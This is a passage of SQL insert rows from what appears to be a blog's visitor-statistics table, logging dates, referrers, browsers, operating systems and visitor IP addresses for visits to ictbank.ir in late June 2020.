(3080,'2020-06-20','http://design-arena.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','195.123.214.113','000',0,1,0),
(3081,'2020-06-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.13.125.208','000',0,1,0),
(3082,'2020-06-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3083,'2020-06-20','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','5.100.249.231','000',0,1,0),
(3084,'2020-06-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3085,'2020-06-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.127.21','000',0,1,0),
(3086,'2020-06-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.75.236','000',0,1,0),
(3087,'2020-06-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3088,'2020-06-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.234.218.239','000',0,1,0),
(3089,'2020-06-20','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.9','000',0,1,0),
(3090,'2020-06-20','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','27.115.124.74','000',0,1,0),
(3091,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.184.54','000',0,1,0),
(3092,'2020-06-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','218.95.167.16','000',0,2,0),
(3093,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.29.181','000',0,1,0),
(3094,'2020-06-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3095,'2020-06-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3096,'2020-06-21','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','69.164.111.198','000',0,4,0),
(3097,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.108.115','000',0,1,0),
(3098,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.158.244.48','000',0,1,0),
(3099,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.243.201.227','000',0,1,0),
(3100,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.74','000',0,1,0),
(3101,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.120.58','000',0,1,0),
(3102,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.6.139.2','000',0,1,0),
(3103,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.211','000',0,1,0),
(3104,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.194.60','000',0,1,0),
(3105,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.122.7','000',0,1,0),
(3106,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','97.74.24.174','000',0,1,0),
(3107,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.161','000',0,1,0),
(3108,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.152','000',0,1,0),
(3109,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.71.238.17','000',0,1,0),
(3110,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.145.203.195','000',0,1,0),
(3111,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.160','000',0,1,0),
(3112,'2020-06-21','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.177.31','000',0,1,0),
(3113,'2020-06-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3114,'2020-06-21','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.109.140.214','000',0,3,0),
(3115,'2020-06-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.194.161','000',0,1,0),
(3116,'2020-06-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3117,'2020-06-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3118,'2020-06-22','https://www.google.com/','Edge','Windows','10.0',NULL,NULL,'','139.47.16.72','000',0,1,0),
(3119,'2020-06-22','http://ictbank.ir/blog','Firefox','OS X','10.10',NULL,NULL,'','37.192.95.140','000',0,1,0),
(3120,'2020-06-22','http://ictbank.ir/blog','Chrome','OS X','10.14.6',NULL,NULL,'','119.3.157.114','000',0,1,0),
(3121,'2020-06-22','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','171.34.179.63','000',0,1,0),
(3122,'2020-06-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','159.203.93.122','000',0,1,0),
(3123,'2020-06-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.209.220','000',0,1,0),
(3124,'2020-06-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,1,0),
(3125,'2020-06-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.225.255','000',0,1,0),
(3126,'2020-06-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.197.85.37','000',0,1,0),
(3127,'2020-06-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3128,'2020-06-22','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','62.210.83.78','000',0,1,0),
(3129,'2020-06-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3130,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.28.194.88','000',0,1,0),
(3131,'2020-06-23','http://ictbank.ir/blog','Chrome','OS X','10.13.4',NULL,NULL,'','166.62.126.3','000',0,1,0),
(3132,'2020-06-23','http://www.google.it/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwiemc7x1JfqAhWGmIsKHdd_AJ0QFjACegQIAxAB&url=http%3A%2F%2Fictbank.ir%2Fblog%2Findex.php%2F2020%2F02%2F02%2Fdatabase-startup-error-fatal-ni-connect-error-12547%2F&usg=AOvVaw1mz7wAb3xdYesYWpltBeSO','Internet Explorer','Windows','10.0',NULL,NULL,'','185.47.99.254','000',0,1,0),
(3133,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','135.181.31.72','000',0,1,0),
(3134,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.195.198','000',0,1,0),
(3135,'2020-06-23','http://ictbank.ir/blog','Chrome','OS X','10.10.5',NULL,NULL,'','104.36.17.77','000',0,1,0),
(3136,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.230.153.184','000',0,1,0),
(3137,'2020-06-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','207.154.209.193','000',0,1,0),
(3138,'2020-06-23','http://ictbank.ir/blog','Safari','iOS','9.1',NULL,NULL,'','220.184.96.17','000',0,1,0),
(3139,'2020-06-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','222.252.17.12','000',0,1,0),
(3140,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.124.8','000',0,1,0),
(3141,'2020-06-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','51.89.201.9','000',0,3,0),
(3142,'2020-06-23','http://ictbank.ir/blog','Opera','Windows','5.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3143,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.177.117','000',0,1,0),
(3144,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','192.254.66.210','000',0,1,0),
(3145,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.139.8.55','000',0,1,0),
(3146,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.60','000',0,1,0),
(3147,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','148.202.85.3','000',0,1,0),
(3148,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.254.85.199','000',0,1,0),
(3149,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.23','000',0,1,0),
(3150,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.104.133','000',0,1,0),
(3151,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.210.102.211','000',0,1,0),
(3152,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.193.159','000',0,1,0),
(3153,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','101.50.1.11','000',0,1,0),
(3154,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','79.170.40.230','000',0,1,0),
(3155,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.32.240.39','000',0,1,0),
(3156,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.67.30.228','000',0,1,0),
(3157,'2020-06-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.225.146.4','000',0,1,0),
(3158,'2020-06-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3159,'2020-06-23','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','37.192.95.140','000',0,1,0),
(3160,'2020-06-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,1,0),
(3161,'2020-06-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3162,'2020-06-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','175.25.185.195','000',0,3,0),
(3163,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.194.137.196','000',0,1,0),
(3164,'2020-06-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.192.68','000',0,1,0),
(3165,'2020-06-24','http://82.102.9.14/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','176.9.23.3','000',0,1,0),
(3166,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','59.173.155.247','000',0,1,0),
(3167,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.202.91.43','000',0,1,0),
(3168,'2020-06-24','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','106.12.77.217','000',0,2,0),
(3169,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.72.57.151','000',0,2,0),
(3170,'2020-06-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3171,'2020-06-24','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','37.192.95.140','000',0,1,0),
(3172,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.115.15','000',0,1,0),
(3173,'2020-06-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','206.222.28.10','000',0,1,0),
(3174,'2020-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','136.169.243.80','000',0,6,0),
(3175,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','193.37.255.114','000',0,1,0),
(3176,'2020-06-24','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','78.111.166.3','000',0,2,0),
(3177,'2020-06-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.248.8','000',0,1,0),
(3178,'2020-06-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.154.235','000',0,1,0),
(3179,'2020-06-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(3180,'2020-06-24','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.3','000',0,1,0),
(3181,'2020-06-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.99','000',0,1,0),
(3182,'2020-06-25','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','94.130.167.248','000',0,1,0),
(3183,'2020-06-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(3184,'2020-06-25','http://mail.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.18','000',0,4,0),
(3185,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.19','000',0,2,0),
(3186,'2020-06-25','http://mail.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.24','000',0,1,0),
(3187,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.229.13','000',0,1,0),
(3188,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.25','000',0,1,0),
(3189,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.26','000',0,1,0),
(3190,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.17','000',0,2,0),
(3191,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.16','000',0,2,0),
(3192,'2020-06-25','http://ictbank.ir/blog','Unknown','Windows','5.1',NULL,NULL,'','188.143.169.29','000',0,2,0),
(3193,'2020-06-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3194,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.174.40','000',0,1,0),
(3195,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','159.203.24.107','000',0,2,0),
(3196,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','159.203.40.244','000',0,1,0),
(3197,'2020-06-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,2,0),
(3198,'2020-06-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','81.183.89.106','000',0,1,0),
(3199,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.69.157.186','000',0,1,0),
(3200,'2020-06-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3201,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.104.111','000',0,1,0),
(3202,'2020-06-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','34.222.173.66','000',0,1,0),
(3203,'2020-06-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','95.142.122.24','000',0,2,0),
(3204,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','142.44.179.150','000',0,2,0),
(3205,'2020-06-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','52.37.65.124','000',0,1,0),
(3206,'2020-06-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3207,'2020-06-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(3208,'2020-06-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3209,'2020-06-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(3210,'2020-06-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','176.31.252.167','000',0,1,0),
(3211,'2020-06-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3212,'2020-06-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','50.116.59.212','000',0,1,0),
(3213,'2020-06-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3214,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.125.124.167','000',0,1,0),
(3215,'2020-06-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','92.118.52.50','000',0,1,0),
(3216,'2020-06-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','14.248.80.13','000',0,1,0),
(3217,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','136.169.243.80','000',0,7,0),
(3218,'2020-06-26','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','45.76.5.109','000',0,1,0),
(3219,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.222.31.112','000',0,1,0),
(3220,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','109.102.111.19','000',0,3,0),
(3221,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.187.199.99','000',0,2,0),
(3222,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','75.98.175.96','000',0,1,0),
(3223,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.237.187.46','000',0,1,0),
(3224,'2020-06-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.185.123.194','000',0,1,0),
(3225,'2020-06-26','http://ictbank.ir/blog','Internet Explorer','Windows','6.0',NULL,NULL,'','195.123.214.113','000',0,1,0),
(3226,'2020-06-26','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','37.231.219.163','000',0,1,0),
(3227,'2020-06-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.23.131','000',0,1,0),
(3228,'2020-06-26','http://ictbank.ir/blog','Chrome','OS X','10.10.4',NULL,NULL,'','37.192.26.37','000',0,1,0),
(3229,'2020-06-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3230,'2020-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3231,'2020-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','198.20.103.242','000',0,1,0),
(3232,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.184.54.160','000',0,1,0),
(3233,'2020-06-27','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','206.222.28.10','000',0,2,0),
(3234,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.154.19','000',0,1,0),
(3235,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','47.75.35.229','000',0,1,0),
(3236,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.209.144.198','000',0,1,0),
(3237,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.148.86.198','000',0,1,0),
(3238,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.110.251.49','000',0,1,0),
(3239,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.242.191.64','000',0,1,0),
(3240,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','64.91.240.183','000',0,1,0),
(3241,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.106','000',0,1,0),
(3242,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','46.242.239.54','000',0,1,0),
(3243,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','123.30.145.145','000',0,1,0),
(3244,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.238.142.12','000',0,1,0),
(3245,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','117.120.40.15','000',0,1,0),
(3246,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','38.121.77.226','000',0,1,0),
(3247,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.217.118.142','000',0,1,0),
(3248,'2020-06-27','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(3249,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.121.185.8','000',0,1,0),
(3250,'2020-06-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(3251,'2020-06-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','35.180.229.226','000',0,1,0),
(3252,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.210.40.87','000',0,1,0),
(3253,'2020-06-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','91.241.19.182','000',0,1,0),
(3254,'2020-06-27','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','217.174.253.177','000',0,1,0),
(3255,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','43.245.222.163','000',0,1,0),
(3256,'2020-06-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','136.169.243.80','000',0,1,0),
(3257,'2020-06-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.99.216.147','000',0,1,0),
(3258,'2020-06-28','http://www.google.com/','Chrome','Windows','6.1',NULL,NULL,'','103.82.235.3','000',0,1,0),
(3259,'2020-06-28','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','217.218.21.242','000',0,3,0),
(3260,'2020-06-28','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3261,'2020-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.126.253.160','000',0,1,0),
(3262,'2020-06-28','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(3263,'2020-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.43.41','000',0,1,0),
(3264,'2020-06-28','http://design-arena.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','35.224.248.68','000',0,3,0),
(3265,'2020-06-28','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','95.216.154.161','000',0,1,0),
(3266,'2020-06-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.156.166.149','000',0,1,0),
(3267,'2020-06-28','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(3268,'2020-06-28','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(3269,'2020-06-28','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','118.89.151.118','000',0,3,0),
(3270,'2020-06-28','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','18.157.186.236','000',0,1,0),
(3271,'2020-06-28','http://www.ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.129.4','000',0,2,0),
(3272,'2020-06-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','103.253.42.41','000',0,1,0),
(3273,'2020-06-29','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,1,0),
(3274,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.195.220.80','000',0,1,0),
(3275,'2020-06-29','http://ictbank.ir/blog','Chromium','Linux','Unknown',NULL,NULL,'','217.218.21.242','000',0,1,0),
(3276,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','23.91.70.100','000',0,1,0),
(3277,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','27.71.226.143','000',0,1,0),
(3278,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','103.149.165.2','000',0,1,0),
(3279,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','184.168.27.12','000',0,1,0),
(3280,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.196.128','000',0,1,0),
(3281,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','93.89.225.42','000',0,1,0),
(3282,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','217.199.187.193','000',0,1,0),
(3283,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','167.114.82.126','000',0,1,0),
(3284,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','198.54.126.140','000',0,1,0),
(3285,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','69.167.175.221','000',0,1,0),
(3286,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','50.63.197.60','000',0,1,0),
(3287,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.180.111.20','000',0,1,0),
(3288,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','94.23.218.10','000',0,1,0),
(3289,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','182.50.130.133','000',0,1,0),
(3290,'2020-06-29','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','45.227.255.233','000',0,1,0),
(3291,'2020-06-29','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,3,0),
(3292,'2020-06-29','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','136.169.243.80','000',0,6,0),
(3293,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.214.152','000',0,1,0),
(3294,'2020-06-29','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','54.207.33.42','000',0,4,0),
(3295,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','23.95.191.213','000',0,1,0),
(3296,'2020-06-29','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.156.190.51','000',0,1,0),
(3297,'2020-06-29','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','5.135.143.224','000',0,2,0),
(3298,'2020-06-29','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','202.40.191.116','000',0,3,0),
(3299,'2020-06-29','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(3300,'2020-06-29','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','46.17.104.14','000',0,1,0),
(3301,'2020-06-29','http://ictbank.ir/blog','Opera','Linux','Unknown',NULL,NULL,'','51.77.52.160','000',0,1,0),
(3302,'2020-06-30','http://82.102.9.14/blog','Firefox','Windows','6.1',NULL,NULL,'','18.185.111.186','000',0,1,0),
(3303,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.218.53.64','000',0,1,0),
(3304,'2020-06-30','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','195.54.160.135','000',0,6,0),
(3305,'2020-06-30','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','173.201.196.55','000',0,1,0),
